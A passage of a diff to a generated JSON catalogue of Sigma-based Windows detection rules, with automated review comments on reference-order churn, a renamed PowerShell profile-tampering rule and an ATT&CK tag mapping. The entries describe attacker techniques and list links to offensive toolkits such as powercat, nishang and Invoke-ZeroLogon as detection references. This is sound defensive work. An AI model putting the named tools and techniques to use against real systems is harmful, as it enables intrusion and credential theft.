"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html",
"https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html",
+ "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml"
],
"tags": [
@@ -24490,63 +24150,6 @@
"uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac",
"value": "GAC DLL Loaded Via Office Applications"
},
- {
- "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/09/07",
- "falsepositive": [
- "Rarely observed"
- ],
- "filename": "image_load_usp_svchost_clfsw32.yml",
- "level": "high",
- "logsource.category": "image_load",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055"
- ]
- },
- "related": [
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc",
- "value": "APT PRIVATELOG Image Load Pattern"
- },
- {
- "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/31",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "image_load_malware_3cx_compromise_susp_dll.yml",
- "level": "critical",
- "logsource.category": "image_load",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_malware_3cx_compromise_susp_dll.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "d0b65ad3-e945-435e-a7a9-438e62dd48e9",
- "value": "Malicious DLL Load By Compromised 3CXDesktopApp"
- },
{
"description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n",
"meta": {
@@ -24856,6 +24459,49 @@
"uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f",
"value": "Microsoft Office DLL Sideload"
},
+ {
+ "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "image_load_side_load_gup_libcurl.yml",
+ "level": "medium",
+ "logsource.category": "image_load",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1574.001",
+ "attack.t1574.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e",
+ "value": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE"
+ },
{
"description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.",
"meta": {
@@ -24902,9 +24548,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
"https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa",
+ "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml"
],
"tags": [
@@ -24971,9 +24617,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/1196390321783025666",
"https://twitter.com/oulusoyum/status/1191329746069655553",
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
+ "https://twitter.com/mattifestation/status/1196390321783025666",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml"
],
"tags": [
@@ -25090,8 +24736,8 @@
"logsource.product": "windows",
"refs": [
"https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/",
- "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
"https://github.com/RiccardoAncarani/LiquidSnake",
+ "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml"
],
"tags": [
@@ -25124,8 +24770,8 @@
"logsource.category": "ps_classic_start",
"logsource.product": "windows",
"refs": [
- "https://github.com/besimorhino/powercat",
"https://nmap.org/ncat/",
+ "https://github.com/besimorhino/powercat",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml"
],
@@ -25160,8 +24806,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/bohops/WSMan-WinRM",
- "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml"
],
"tags": [
@@ -25725,8 +25371,8 @@
"logsource.product": "windows",
"refs": [
"https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
- "https://www.mdeditor.tw/pl/pgRt",
"https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
+ "https://www.mdeditor.tw/pl/pgRt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml"
],
"tags": [
@@ -25760,8 +25406,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml"
],
"tags": [
@@ -25786,8 +25432,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml"
],
"tags": [
@@ -25820,8 +25466,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml"
],
"tags": [
@@ -26004,8 +25650,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
"https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml"
],
"tags": [
@@ -26114,19 +25760,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml"
],
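Review bot: most of this hunk is churn rather than change: the eleven removed refs reappear unchanged further down the list, and only three URLs (ADRecon, Powermad, AzureADRecon) are actually new. If the generator emits `refs` in whatever order the upstream rule lists them, sorting the list (or preserving the existing order and appending new entries) before serialising would keep these diffs reviewable; the same reorder-only pattern recurs in nearly every `refs` hunk below, so this is a generator fix rather than a per-entry one.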
@@ -26493,22 +26142,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/NetSPI/PowerUpSQL",
"https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/samratashok/nishang",
- "https://github.com/AlsidOfficial/WSUSpendu/",
- "https://github.com/nettitude/Invoke-PowerThIEf",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/besimorhino/powercat",
"https://github.com/PowerShellMafia/PowerSploit",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/S3cur3Th1sSh1t/WinPwn",
+ "https://github.com/AlsidOfficial/WSUSpendu/",
"https://github.com/CsEnox/EventViewer-UACBypass",
+ "https://github.com/nettitude/Invoke-PowerThIEf",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/NetSPI/PowerUpSQL",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://github.com/S3cur3Th1sSh1t/WinPwn",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml"
],
"tags": [
@@ -27332,8 +26981,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
+ "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml"
],
"tags": [
@@ -27450,10 +27099,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://powersploit.readthedocs.io/en/stable/Recon/README",
"https://adsecurity.org/?p=2277",
- "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
+ "https://powersploit.readthedocs.io/en/stable/Recon/README",
"https://thedfirreport.com/2020/10/08/ryuks-return",
+ "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml"
],
"tags": [
@@ -27528,8 +27177,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"
],
"tags": [
@@ -27630,9 +27279,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml"
],
"tags": [
@@ -27652,6 +27301,40 @@
"uuid": "db885529-903f-4c5d-9864-28fe199e6370",
"value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell"
},
+ {
+ "description": "Detects calls to \"Add-Content\" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2021/08/18",
+ "falsepositive": [
+ "Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session"
+ ],
+ "filename": "posh_ps_user_profile_tampering.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.013"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152",
+ "value": "Potential Persistence Via PowerShell User Profile Using Add-Content"
+ },
{
"description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)",
"meta": {
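Review bot: this block is a rename and metadata update, not a new rule: its `uuid` `05b3e303-faf0-4f4a-9b30-46cc13e69152` is the same one carried by the `posh_ps_trigger_profiles.yml` entry that a later hunk deletes, with the filename changed to `posh_ps_user_profile_tampering.yml`, a second author added and `attack.persistence` added to the tags. Keeping the uuid stable is correct, since existing MISP correlations point at it, but `creation_date` stays at 2021/08/18 and the cluster carries no modification date, so consumers cannot see that the description and tags changed; if the upstream rule exposes a `modified` field, consider mapping it into `meta`.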
@@ -27833,10 +27516,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php",
"http://woshub.com/manage-windows-firewall-powershell/",
- "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html",
"https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell",
+ "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php",
+ "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html",
"https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml"
],
@@ -27870,8 +27553,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell",
+ "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml"
],
"tags": [
@@ -28027,10 +27710,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://youtu.be/5mqid-7zp8k?t=2481",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://youtu.be/5mqid-7zp8k?t=2481",
"https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml"
],
"tags": [
@@ -28106,6 +27789,40 @@
"uuid": "7d416556-6502-45b2-9bad-9d2f05f38997",
"value": "Powershell Sensitive File Discovery"
},
+ {
+ "description": "Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "The same functionality can be implemented by admin scripts, correlate with name and creator"
+ ],
+ "filename": "posh_ps_resolve_list_of_ip_from_file.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://www.fortypoundhead.com/showcontent.asp?artid=24022",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fbc5e92f-3044-4e73-a5c6-1c4359b539de",
+ "value": "PowerShell Script With File Hostname Resolving Capabilities"
+ },
{
"description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
"meta": {
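Review bot: the tags map this entry only to `attack.exfiltration` / `attack.t1020`, while the description and the filename (`posh_ps_resolve_list_of_ip_from_file.yml`) describe reading a file, looping over it and resolving DNS entries, which is preparatory rather than exfiltration behaviour on its own. If that single mapping is what the upstream rule carries it should be mirrored as-is, but it is worth confirming against the source rule before merging, since the `related` link to `774a3188-6ba9-4dc4-879d-d54ee48a5ce9` is derived from it.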
@@ -28248,8 +27965,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.powershellgallery.com/packages/DSInternals",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount",
+ "https://www.powershellgallery.com/packages/DSInternals",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml"
],
"tags": [
@@ -28324,8 +28041,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://adsecurity.org/?p=2604",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml"
],
@@ -28521,39 +28238,6 @@
"uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b",
"value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell"
},
- {
- "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "posh_ps_trigger_profiles.yml",
- "level": "medium",
- "logsource.category": "ps_script",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1546.013"
- ]
- },
- "related": [
- {
- "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152",
- "value": "Powershell Trigger Profiles by Add_Content"
- },
{
"description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet",
"meta": {
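Review bot: this deletion is the other half of the rename noted earlier: the removed entry's uuid `05b3e303-faf0-4f4a-9b30-46cc13e69152` is re-added under the new filename and title "Potential Persistence Via PowerShell User Profile Using Add-Content". Because the add and the remove sit several hundred lines apart, a reader of this diff could mistake it for a dropped rule; the commit message should say explicitly that the profile-tampering rule was renamed and that no uuid was retired.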
@@ -28675,8 +28359,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://twitter.com/WindowsDocs/status/1620078135080325122",
+ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml"
],
"tags": [
@@ -28866,8 +28550,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/JohnLaTwC/status/850381440629981184",
"https://t.co/ezOTGy1a1G",
+ "https://twitter.com/JohnLaTwC/status/850381440629981184",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml"
],
"tags": [
@@ -28935,8 +28619,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps",
"https://twitter.com/NathanMcNulty/status/1569497348841287681",
+ "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml"
],
"tags": [
@@ -29101,8 +28785,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml"
],
"tags": [
@@ -29196,8 +28880,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
"https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml"
],
"tags": [
@@ -29416,8 +29100,8 @@
"logsource.product": "windows",
"refs": [
"https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml"
],
"tags": [
@@ -29770,8 +29454,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting",
+ "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml"
],
"tags": [
@@ -29939,8 +29623,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
